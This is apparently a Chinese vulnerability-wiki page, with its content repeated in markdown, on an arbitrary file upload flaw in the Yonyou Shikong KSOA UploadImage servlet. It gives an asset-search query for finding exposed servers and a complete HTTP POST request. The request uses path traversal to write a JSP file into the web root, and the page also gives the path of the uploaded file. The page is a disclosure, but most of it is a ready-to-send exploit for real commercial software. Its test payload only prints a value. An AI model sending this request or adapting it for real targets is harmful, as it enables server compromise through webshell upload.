fofamini-wiki

登录白背景

源码

用友时空KSOA UploadImage 任意文件上传漏洞

一、漏洞简介

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台UploadImage处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

二、影响版本

用友时空KSOA

三、资产测绘

hunterapp.name="用友时空 KSOA"

登录页面

四、漏洞复现

POST /servlet/com.sksoft.v8.desktop.UploadImage?fileextr=.jsp&rpath=../webapps/ROOT/ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/109.0.3069.12 Safari/537.36
Content-Length: 25
Accept: */*
Accept-Encoding: gzip, deflate
SL-CE-SUID: 93

<% out.print(111); %>

文件上传地址

/202413120111143110.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/xar9mqgnqgtg8nw7

# 用友时空KSOA UploadImage 任意文件上传漏洞

# 一、漏洞简介
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台UploadImage处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

# 二、影响版本
+ 用友时空KSOA

# 三、资产测绘
+ hunter`app.name="用友时空 KSOA"`

![1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86.png](./img/6d7GmrG3QiAgnGEW/1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86-351505.png)

+ 登录页面

![1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7.png](./img/6d7GmrG3QiAgnGEW/1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7-658598.png)

# 四、漏洞复现
```plain
POST /servlet/com.sksoft.v8.desktop.UploadImage?fileextr=.jsp&rpath=../webapps/ROOT/ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/109.0.3069.12 Safari/537.36
Content-Length: 25
Accept: */*
Accept-Encoding: gzip, deflate
SL-CE-SUID: 93

<% out.print(111); %>
```

![1710906275923-f4c2f642-9fab-47cf-9bd1-28efa9ecc0af.png](./img/6d7GmrG3QiAgnGEW/1710906275923-f4c2f642-9fab-47cf-9bd1-28efa9ecc0af-854126.png)

文件上传地址

```plain
/202413120111143110.jsp
```

![1710906301562-1ce2f531-d3b1-4b2b-b9da-7d5980f9a827.png](./img/6d7GmrG3QiAgnGEW/1710906301562-1ce2f531-d3b1-4b2b-b9da-7d5980f9a827-399325.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xar9mqgnqgtg8nw7>